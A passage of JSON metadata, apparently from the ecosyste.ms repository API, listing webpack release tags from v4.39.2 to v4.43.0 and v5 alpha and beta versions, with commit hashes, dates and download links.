43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","k